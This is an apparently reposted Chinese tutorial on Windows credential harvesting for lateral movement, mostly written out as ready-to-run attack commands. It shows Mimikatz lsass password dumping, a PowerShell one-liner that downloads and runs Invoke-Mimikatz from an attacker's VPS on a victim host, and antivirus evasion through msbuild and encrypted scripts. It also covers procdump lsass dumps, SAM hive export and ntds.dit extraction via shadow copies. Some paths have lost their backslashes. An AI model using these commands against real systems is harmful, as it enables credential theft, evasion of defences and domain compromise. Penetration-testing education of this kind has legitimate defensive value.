【内网渗透基础】内网横向-主机凭据获取

admin 2025年4月10日20:52:04评论8 views字数 4824阅读16分4秒阅读模式
免责声明
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不承担任何法律及连带责任。
简介 ]
——————————————————————
天上尘,地下土。你选择什么样的方式,就会拥有什么样的人生。真正的优秀不是别人逼出来的,而是自己和自己死磕
摘自真正的优秀,都是自找的】 
——————————————————————

主机凭据获取

本文主要讲解内网横向的前置准备获取主机凭据,通过获取的凭据后续进行PTH、密码喷洒等。这里主要介绍几种获取主机凭据的方法Mimikatz抓取、离线转存储等

目录
主机凭据获取
    一、Mimikatz抓取
                1.1 原版Mimikatz抓取
                1.2 powershell远程加载
                1.3 简单的Mimikatz免杀
    二、离线导出lass.exe密码
 2.1lsass.exe转存储
2.2 procdump导出dmp
三、SAM数据库提取HASH
四、卷影拷贝提取ntds.dit

漏洞信息

混子Hacker     

01

Mimikatz抓取

1.1 Mimikatz抓取

Mimikatz是由法国安全研究员 Benjamin Delpy 开发的一款开源工具,最初用于演示 Windows 身份认证机制(如 NTLM、Kerberos)的安全漏洞。通过它可以直接从 lsass.exe 进程中获取当前登录系统用户名的密码

lsass是微软Windows系统的安全机制它主要用于本地安全和登陆策略,通常我们在登陆系统时输入密码之后,密码便会储存在 lsass内存中,经过其 wdigest 和 tspkg 两个模块调用后,对其使用可逆的算法进行加密并存储在内存之中, 而 mimikatz 正是通过对lsass逆算获取到明文密码

需要注意的是,Mimikatz在低版本的系统win10和2012R2以下版本中可以抓取到明文密码,但是在win10和2012R2及以上的版本中默认禁止存储明文密码了

下载地址:

https://github.com/gentilkiwi/mimikatz/releases

【内网渗透基础】内网横向-主机凭据获取
常用命令
cls:       清屏standard:  标准模块,基本命令crypto:    加密相关模块sekurlsa:  与证书相关的模块kerberos:  kerberos模块privilege: 提权相关模块process:   进程相关模块serivce:   服务相关模块lsadump:   LsaDump模块ts:        终端服务器模块event:     事件模块misc:      杂项模块token:     令牌操作模块vault:     Windows 、证书模块minesweeper:Mine Sweeper模块dpapi:     DPAPI模块(通过API或RAW访问)[数据保护应用程序编程接口]busylight: BusyLight Modulesysenv:    系统环境值模块sid:       安全标识符模块iis:       IIS XML配置模块rpc:       mimikatz的RPC控制sr98:      用于SR98设备和T5577目标的RF模块rdm:       RDM(830AL)器件的射频模块acr:       ACR模块version:   查看版本exit:      退出

抓取明文密码

privilege::debug          提升至DebugPrivilege权限sekurlsa::logonpasswords  导出用户凭据
【内网渗透基础】内网横向-主机凭据获取

1.2 powershell远程加载

Invoke-Mimikatz.ps1下载地址:

https://raw.githubusercontent.com/TideSec/BypassAntiVirus/refs/heads/master/tools/mimikatz/Invoke-Mimikatz.ps1

将powershell脚本放到自己的VPS上

然后在受害主机上运行

powershell.exe -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal "IEX(New-Object Net.WebClient).DownloadString('http://vps-ip/Invoke-Mimikatz.ps1');Invoke-Mimikatz"
【内网渗透基础】内网横向-主机凭据获取

需要注意的是像mimikatz这种常见的渗透工具早已经被各大安全厂商加入了特征库

一般传上去即被杀很容易暴露攻击行为,实战中需要做一下简单的免杀

1.3 Mimikatz简单的免杀版

原文链接:

https://blog.csdn.net/2301_76786857/article/details/140174818

方法1-白名单msbuild.exe加载(VT查杀率4/59)

下载mimikatz.xml

https://raw.githubusercontent.com/TideSec/BypassAntiVirus/master/tools/mimikatz/executes-mimikatz.xml

执行

C:WindowsMicrosoft.NETFramework64v4.0.30319msbuild.exe executes-mimikatz.xml
【内网渗透基础】内网横向-主机凭据获取

virustotal.com上executes-mimikatz.xml查杀率为4/59。

【内网渗透基础】内网横向-主机凭据获取

方法2-使用Out-EncryptedScript加密(VT查杀率0/60)

Powersploit中提供的很多工具都是做过加密处理的,同时也提供了一些用来加密处理的脚本,Out-EncryptedScript就是其中之一。

首先在本地对Invoke-Mimikatz.ps1进行加密处理:

先下载Out-EncryptedScript.ps1脚本,下载地址:https://raw.githubusercontent.com/TideSec/BypassAntiVirus/master/tools/mimikatz/Out-EncryptedScript.ps1

在自己的电脑上依次执行

powershell.exeImport-Module .Out-EncryptedScript.ps1Out-EncryptedScript -ScriptPath .Invoke-M

默认会生成的evil.ps1文件。其中两个参数:-Password 设置加密的密钥-Salt 随机数,防止被暴力破解

【内网渗透基础】内网横向-主机凭据获取

将加密生成的evil.ps1脚本放在目标机上,执行如下命令:

[String$cmd = Get-Content .evil.ps1Invoke-Expression $cmd$decrypted = de tidesec 123456Invoke-Expression $decryptedInvoke-Mimikatz
【内网渗透基础】内网横向-主机凭据获取

virustotal.com上evil.ps1文件查杀率为0/60。

【内网渗透基础】内网横向-主机凭据获取

混子Hacker

02

离线导出lsass.exe密码

2.1 lsass.exe转存储
打开任务管理器找到lsass.exe
右键选择创建转储文件
【内网渗透基础】内网横向-主机凭据获取
使用Mimikatz.exe读取lsass.DMP
sekurlsa::minidump lsass.DMPsekurlsa::logonPasswords full
【内网渗透基础】内网横向-主机凭据获取
2.2 procdump导出dmp

在目标机器执行下面命令,导出lsass.dmp

procdump.exe -accepteula -ma lsass.exe lsass.dmp
【内网渗透基础】内网横向-主机凭据获取

再使用mimikatz读取密码

sekurlsa::minidump lsass.dmpsekurlsa::logonPasswords full

需要注意的是从目标机器导出的lsass.dmp需要在相同系统下运行。

【内网渗透基础】内网横向-主机凭据获取

混子Hacker

03

SAM数据库提取HASH

SAM(安全账户管理器)数据库存储本地账户的NTLM哈希,位于注册表中,由SYSTEM密钥保护。

导出SAM、SYSTEM和SECURITY文件

reg save HKLMSAM sam.savereg save HKLMSYSTEM system.savereg save HKLMSECURITY security.save
【内网渗透基础】内网横向-主机凭据获取
使用Mimikatz提取HASH
lsadump::sam /sam:sam.save /system:system.save
【内网渗透基础】内网横向-主机凭据获取
hash值可以拿去破解网站尝试破解
【内网渗透基础】内网横向-主机凭据获取

混子Hacker

04

卷影拷贝提取ntds.dit

ntds.dit是一个二进制文件,存储位置为域控制器的%SystemRoot%ntdsntds.dit是一个数据库,用于存储Active Directory数据,包括有关用户对象,组和组成员身份的信息。通过提取用户哈希值,可以使用诸如Mimikatz之类的工具执行哈希传递攻击,或使用诸如Hashcat之类的工具来破解这些密码。

运维人员会利用卷影拷贝服务(volume Shadow Copy Server,VSS)实现ntds.dit的拷贝,VSS本质上属快照(Snamshot)技术的一种,主要用于备份和恢复(即使目标文件被系统锁定)

利用vssadmin提取ntds.dit

vssadmin 是Windows Server 2008及 Windows 7提供的VSS管理工具,可用于创建和删除卷影拷贝。

创建C盘的卷影拷贝

vssadmin create shadow /for=c:

在卷影拷贝中将ntds.dit复制出来

copy \?GLOBALROOTDeviceHarddiskVolumeShadowCopy1windowsntdsntds.dit c:ntds.dit

删除快照

vssadmin delete shadows /for=c: /quiet

最后还需要转储system.hive

system.hive中存放着ntds.dit的密钥,如果没有该密钥,将无法查看ntds.dit中的信息:

【内网渗透基础】内网横向-主机凭据获取

利用impacket的secretdump导出ntds.dit域内用户hash

python secretsdump.py -system system.hive -ntds ntds.dit LOCAL
【内网渗透基础】内网横向-主机凭据获取
本专栏往期文章:

【内网渗透基础】一、信息收集

【内网渗透基础】二、隧道建立

【内网渗透基础】二、隧道建立(下)

【内网渗透基础】三、权限提升-Windows内核提权

【内网渗透基础】三、权限提升-Windows内核提权(下)

【内网渗透基础】三、权限提升-Windows第三方软件提权

【内网渗透基础】三、权限提升-Linux提权

<<<  END >>>

原创文章|转载请附上原文出处链接

更多漏洞|关注作者查看

作者|混子Hacker

原文始发于微信公众号(混子Hacker):【内网渗透基础】内网横向-主机凭据获取

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年4月10日20:52:04
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【内网渗透基础】内网横向-主机凭据获取https://cn-sec.com/archives/3937055.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息